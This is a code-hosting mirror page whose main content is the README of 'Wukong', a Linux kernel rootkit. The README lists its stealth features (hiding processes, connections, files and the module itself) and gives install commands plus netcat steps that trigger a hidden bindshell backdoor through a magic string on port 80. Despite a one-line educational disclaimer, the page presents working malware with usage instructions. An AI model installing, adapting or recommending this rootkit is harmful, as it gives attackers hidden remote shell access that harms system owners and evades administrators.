Metrics
0
Watch 1 Star 3 Fork 0

码云极速下载 / Wukong-RootkitPerlGPL-2.0

Sign up for free
Explore and code with more than 2 million developers,Free private repositories !:)
Sign up
此仓库是为了提升国内下载速度的镜像仓库,每日同步一次。 原始仓库: https://github.com/hanj4096/wukong
Rootkit 是隐者,负责隐身,它是由二进制代码、脚本和配置文件组成的一套工具,能够使用它隐秘地保持对计算机的访问权限,以便在不引起系统管理员注意的情况下发布命令、搜索数据 spread retract

Clone or download
Cancel
Notice: Creating folder will generate an empty file .keep, because not support in Git
Loading...
README.md

Wukong: a LKM rootkit for Linux kernel 2.6.x, 3.x and 4.x


Note:

    This kernel rootkit is just for educational purpose and it shouldn't be used for any illegal activities, use this at your own risk.



Function

    1. Hide Linux Process.
    2. Hide TCP connection.
    3. Hide File/Directory.
    4. Hide wukong.ko.
    5. Redirect TCP connection to backdoor server by using the specific confidential password.

Usage

    1. Environment:
    ubunt-14.04 (1.1.1.33) --- (1.1.1.1)ubunt-14.04  
    (client)                          (server)

    2. Test step:
    a. on server
    cd wukong/
    sudo ./install.pl
    sudo nc -k -l 80

    b. on client
    nc 1.1.1.1 80
    http
    ifconfig
    PS:The connection will be redirected to bindshell

    nc 1.1.1.1 80
    111111
    PS: a rst will be received.

    nc 1.1.1.1 80
    111111
    aaaaaa
    PS: The connection will be connected with tcp 80.

    3. Result:
    a. Bindshell file is hidden.
    b. Tcp 8000 connection is hidden.
    c. Bindshell process is hidden
    d. wukong.ko is hidden
    e. If "http" is the first four bytes to TCP 80, connection will be established with bindshell.


Tested OS:

    CentOS-5.5-i386-bin-DVD.iso
        Linux  2.6.18-408.el5 #1 SMP Tue Jan 19 09:13:33 EST 2016 i686 i686 i386 GNU/Linux
    CentOS-5.5-x86_64-bin-DVD
        Linux 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
    ubuntu-14.04.2-desktop-i386.iso
        Linux  3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
    ubuntu-14.04.2-desktop-amd64.iso   
        Linux  3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    ubuntu-14.04.3-desktop-i386.iso
        Linux  3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
    ubuntu-14.04.3-desktop-amd64.iso
        Linux  3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux


ToDo:

    Do performance tuning, make it can work on Linux server with large traffic.
    Adding more features.

Comments ( 0 )

You need to Sign in for post a comment

Help Search